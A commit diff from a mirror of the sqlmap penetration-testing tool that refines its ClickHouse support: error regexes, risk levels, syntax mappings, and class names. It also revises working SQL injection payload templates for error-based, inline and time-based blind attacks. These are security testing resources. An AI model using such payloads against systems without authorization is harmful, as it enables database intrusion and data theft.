mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2025-10-30 15:37:43 +03:00
Some more fixes related to ClickHouse support (#5229)
This commit is contained in:
Miroslav Stampar
parent
d7180d38c4
commit
30ba167cc1
|
|
@ -211,8 +211,9 @@
|
||||||
<error regexp="Syntax error,[^\n]+assumed to mean"/>
|
<error regexp="Syntax error,[^\n]+assumed to mean"/>
|
||||||
</dbms>
|
</dbms>
|
||||||
|
|
||||||
<dbms value="Clickhouse">
|
<dbms value="ClickHouse">
|
||||||
<error regexp="DB::Exception: Syntax error:"/>
|
<error regexp="Code: \d+. DB::Exception:"/>
|
||||||
|
<error regexp="Syntax error: failed at position \d+"/>
|
||||||
</dbms>
|
</dbms>
|
||||||
|
|
||||||
<dbms value="CrateDB">
|
<dbms value="CrateDB">
|
||||||
|
|
|
||||||
|
|
@ -838,7 +838,7 @@
|
||||||
<title>IBM DB2 OR error-based - WHERE or HAVING clause</title>
|
<title>IBM DB2 OR error-based - WHERE or HAVING clause</title>
|
||||||
<stype>2</stype>
|
<stype>2</stype>
|
||||||
<level>4</level>
|
<level>4</level>
|
||||||
<risk>1</risk>
|
<risk>3</risk>
|
||||||
<clause>1</clause>
|
<clause>1</clause>
|
||||||
<where>1</where>
|
<where>1</where>
|
||||||
<vector>OR [RANDNUM]=RAISE_ERROR('70001','[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
|
<vector>OR [RANDNUM]=RAISE_ERROR('70001','[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
|
||||||
|
|
@ -853,23 +853,41 @@
|
||||||
</details>
|
</details>
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
|
|
||||||
<test>
|
<test>
|
||||||
<title>Clickhouse AND error-based - Parameter replace</title>
|
<title>ClickHouse AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause</title>
|
||||||
<stype>2</stype>
|
<stype>2</stype>
|
||||||
<level>2</level>
|
<level>3</level>
|
||||||
<risk>1</risk>
|
<risk>1</risk>
|
||||||
<clause>1,2,3,9</clause>
|
<clause>1,2,3,9</clause>
|
||||||
<where>1</where>
|
<where>1</where>
|
||||||
<vector>AND [RANDNUM]=CAST('[DELIMITER_START]'||CAST(([QUERY]), 'String')||'[DELIMITER_STOP]' AS String)</vector>
|
<vector>AND [RANDNUM]=('[DELIMITER_START]'||CAST(([QUERY]) AS String)||'[DELIMITER_STOP]')</vector>
|
||||||
<request>
|
<request>
|
||||||
<payload>AND [RANDNUM]=CAST('[DELIMITER_START]'||CAST((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)), 'String')||'[DELIMITER_STOP]' AS String)</payload>
|
<payload>AND [RANDNUM]=('[DELIMITER_START]'||(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)||'[DELIMITER_STOP]')</payload>
|
||||||
</request>
|
</request>
|
||||||
<response>
|
<response>
|
||||||
<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
|
<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
|
||||||
</response>
|
</response>
|
||||||
<details>
|
<details>
|
||||||
<dbms>Clickhouse</dbms>
|
<dbms>ClickHouse</dbms>
|
||||||
|
</details>
|
||||||
|
</test>
|
||||||
|
|
||||||
|
<test>
|
||||||
|
<title>ClickHouse OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause</title>
|
||||||
|
<stype>2</stype>
|
||||||
|
<level>4</level>
|
||||||
|
<risk>3</risk>
|
||||||
|
<clause>1,2,3,9</clause>
|
||||||
|
<where>1</where>
|
||||||
|
<vector>OR [RANDNUM]=('[DELIMITER_START]'||CAST(([QUERY]) AS String)||'[DELIMITER_STOP]')</vector>
|
||||||
|
<request>
|
||||||
|
<payload>OR [RANDNUM]=('[DELIMITER_START]'||(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)||'[DELIMITER_STOP]')</payload>
|
||||||
|
</request>
|
||||||
|
<response>
|
||||||
|
<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
|
||||||
|
</response>
|
||||||
|
<details>
|
||||||
|
<dbms>ClickHouse</dbms>
|
||||||
</details>
|
</details>
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
|
|
|
||||||
|
|
@ -135,21 +135,21 @@
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
<test>
|
<test>
|
||||||
<title>Clickhouse inline queries</title>
|
<title>ClickHouse inline queries</title>
|
||||||
<stype>3</stype>
|
<stype>3</stype>
|
||||||
<level>2</level>
|
<level>3</level>
|
||||||
<risk>1</risk>
|
<risk>1</risk>
|
||||||
<clause>1,2,3,8</clause>
|
<clause>1,2,3,8</clause>
|
||||||
<where>3</where>
|
<where>3</where>
|
||||||
<vector>(SELECT '[DELIMITER_START]'||CAST(([QUERY]), 'String')||'[DELIMITER_STOP]')</vector>
|
<vector>('[DELIMITER_START]'||CAST(([QUERY]) AS String)||'[DELIMITER_STOP]')</vector>
|
||||||
<request>
|
<request>
|
||||||
<payload>(SELECT '[DELIMITER_START]'||CAST((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)), 'String')||'[DELIMITER_STOP]')</payload>
|
<payload>('[DELIMITER_START]'||(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)||'[DELIMITER_STOP]')</payload>
|
||||||
</request>
|
</request>
|
||||||
<response>
|
<response>
|
||||||
<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
|
<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
|
||||||
</response>
|
</response>
|
||||||
<details>
|
<details>
|
||||||
<dbms>Clickhouse</dbms>
|
<dbms>ClickHouse</dbms>
|
||||||
</details>
|
</details>
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
|
|
|
||||||
|
|
@ -1494,12 +1494,30 @@
|
||||||
</details>
|
</details>
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
|
<test>
|
||||||
|
<title>ClickHouse AND time-based blind (heavy query)</title>
|
||||||
|
<stype>5</stype>
|
||||||
|
<level>4</level>
|
||||||
|
<risk>1</risk>
|
||||||
|
<clause>1,2,3</clause>
|
||||||
|
<where>1</where>
|
||||||
|
<vector>AND [RANDNUM]=(SELECT COUNT(fuzzBits('[RANDSTR]', 0.001)) FROM numbers(if(([INFERENCE]), 1000000, 1)))</vector>
|
||||||
|
<request>
|
||||||
|
<payload>AND [RANDNUM]=(SELECT COUNT(fuzzBits('[RANDSTR]', 0.001)) FROM numbers(1000000))</payload>
|
||||||
|
</request>
|
||||||
|
<response>
|
||||||
|
<time>[DELAYED]</time>
|
||||||
|
</response>
|
||||||
|
<details>
|
||||||
|
<dbms>ClickHouse</dbms>
|
||||||
|
</details>
|
||||||
|
</test>
|
||||||
|
|
||||||
<test>
|
<test>
|
||||||
<title>Clickhouse AND time-based blind (heavy query) - fuzzBits</title>
|
<title>ClickHouse OR time-based blind (heavy query)</title>
|
||||||
<stype>5</stype>
|
<stype>5</stype>
|
||||||
<level>3</level>
|
<level>5</level>
|
||||||
<risk>1</risk>
|
<risk>3</risk>
|
||||||
<clause>1,2,3</clause>
|
<clause>1,2,3</clause>
|
||||||
<where>1</where>
|
<where>1</where>
|
||||||
<vector>OR [RANDNUM]=(SELECT COUNT(fuzzBits('[RANDSTR]', 0.001)) FROM numbers(if(([INFERENCE]), 1000000, 1)))</vector>
|
<vector>OR [RANDNUM]=(SELECT COUNT(fuzzBits('[RANDSTR]', 0.001)) FROM numbers(if(([INFERENCE]), 1000000, 1)))</vector>
|
||||||
|
|
@ -1510,7 +1528,7 @@
|
||||||
<time>[DELAYED]</time>
|
<time>[DELAYED]</time>
|
||||||
</response>
|
</response>
|
||||||
<details>
|
<details>
|
||||||
<dbms>Clickhouse</dbms>
|
<dbms>ClickHouse</dbms>
|
||||||
</details>
|
</details>
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
|
|
|
||||||
|
|
@ -1319,7 +1319,7 @@
|
||||||
</search_column>
|
</search_column>
|
||||||
</dbms>
|
</dbms>
|
||||||
|
|
||||||
<dbms value="Clickhouse">
|
<dbms value="ClickHouse">
|
||||||
<cast query="CAST(%s AS String)"/>
|
<cast query="CAST(%s AS String)"/>
|
||||||
<length query="length(%s)"/>
|
<length query="length(%s)"/>
|
||||||
<isnull query="ifNull(%s, '')"/>
|
<isnull query="ifNull(%s, '')"/>
|
||||||
|
|
@ -1331,7 +1331,7 @@
|
||||||
<limitstring query=" LIMIT "/>
|
<limitstring query=" LIMIT "/>
|
||||||
<order query="ORDER BY %s ASC"/>
|
<order query="ORDER BY %s ASC"/>
|
||||||
<count query="COUNT(%s)"/>
|
<count query="COUNT(%s)"/>
|
||||||
<comment query="--" query2="/*"/>
|
<comment query="--" query2="//"/>
|
||||||
<substring query="substring(%s,%d,%d)"/>
|
<substring query="substring(%s,%d,%d)"/>
|
||||||
<concatenate query="%s||%s"/>
|
<concatenate query="%s||%s"/>
|
||||||
<case query="SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END)"/>
|
<case query="SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END)"/>
|
||||||
|
|
|
||||||
|
|
@ -47,8 +47,8 @@ from plugins.dbms.altibase.connector import Connector as AltibaseConn
|
||||||
from plugins.dbms.altibase import AltibaseMap
|
from plugins.dbms.altibase import AltibaseMap
|
||||||
from plugins.dbms.cache.connector import Connector as CacheConn
|
from plugins.dbms.cache.connector import Connector as CacheConn
|
||||||
from plugins.dbms.cache import CacheMap
|
from plugins.dbms.cache import CacheMap
|
||||||
from plugins.dbms.clickhouse.connector import Connector as ClickhouseConn
|
from plugins.dbms.clickhouse.connector import Connector as ClickHouseConn
|
||||||
from plugins.dbms.clickhouse import ClickhouseMap
|
from plugins.dbms.clickhouse import ClickHouseMap
|
||||||
from plugins.dbms.cratedb.connector import Connector as CrateDBConn
|
from plugins.dbms.cratedb.connector import Connector as CrateDBConn
|
||||||
from plugins.dbms.cratedb import CrateDBMap
|
from plugins.dbms.cratedb import CrateDBMap
|
||||||
from plugins.dbms.cubrid.connector import Connector as CubridConn
|
from plugins.dbms.cubrid.connector import Connector as CubridConn
|
||||||
|
|
@ -125,7 +125,7 @@ def setHandler():
|
||||||
(DBMS.PRESTO, PRESTO_ALIASES, PrestoMap, PrestoConn),
|
(DBMS.PRESTO, PRESTO_ALIASES, PrestoMap, PrestoConn),
|
||||||
(DBMS.ALTIBASE, ALTIBASE_ALIASES, AltibaseMap, AltibaseConn),
|
(DBMS.ALTIBASE, ALTIBASE_ALIASES, AltibaseMap, AltibaseConn),
|
||||||
(DBMS.MIMERSQL, MIMERSQL_ALIASES, MimerSQLMap, MimerSQLConn),
|
(DBMS.MIMERSQL, MIMERSQL_ALIASES, MimerSQLMap, MimerSQLConn),
|
||||||
(DBMS.CLICKHOUSE, CLICKHOUSE_ALIASES, ClickhouseMap, ClickhouseConn),
|
(DBMS.CLICKHOUSE, CLICKHOUSE_ALIASES, ClickHouseMap, ClickHouseConn),
|
||||||
(DBMS.CRATEDB, CRATEDB_ALIASES, CrateDBMap, CrateDBConn),
|
(DBMS.CRATEDB, CRATEDB_ALIASES, CrateDBMap, CrateDBConn),
|
||||||
(DBMS.CUBRID, CUBRID_ALIASES, CubridMap, CubridConn),
|
(DBMS.CUBRID, CUBRID_ALIASES, CubridMap, CubridConn),
|
||||||
(DBMS.CACHE, CACHE_ALIASES, CacheMap, CacheConn),
|
(DBMS.CACHE, CACHE_ALIASES, CacheMap, CacheConn),
|
||||||
|
|
|
||||||
|
|
@ -20,7 +20,7 @@ from thirdparty import six
|
||||||
from thirdparty.six import unichr as _unichr
|
from thirdparty.six import unichr as _unichr
|
||||||
|
|
||||||
# sqlmap version (<major>.<minor>.<month>.<monthly commit>)
|
# sqlmap version (<major>.<minor>.<month>.<monthly commit>)
|
||||||
VERSION = "1.7.2.2"
|
VERSION = "1.7.2.3"
|
||||||
TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
|
TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
|
||||||
TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
|
TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
|
||||||
VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
|
VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
|
||||||
|
|
|
||||||
|
|
@ -16,7 +16,7 @@ from plugins.dbms.clickhouse.syntax import Syntax
|
||||||
from plugins.dbms.clickhouse.takeover import Takeover
|
from plugins.dbms.clickhouse.takeover import Takeover
|
||||||
from plugins.generic.misc import Miscellaneous
|
from plugins.generic.misc import Miscellaneous
|
||||||
|
|
||||||
class ClickhouseMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover):
|
class ClickHouseMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover):
|
||||||
"""
|
"""
|
||||||
This class defines ClickHouse methods
|
This class defines ClickHouse methods
|
||||||
"""
|
"""
|
||||||
|
|
|
||||||
Loading…
Reference in New Issue
Block a user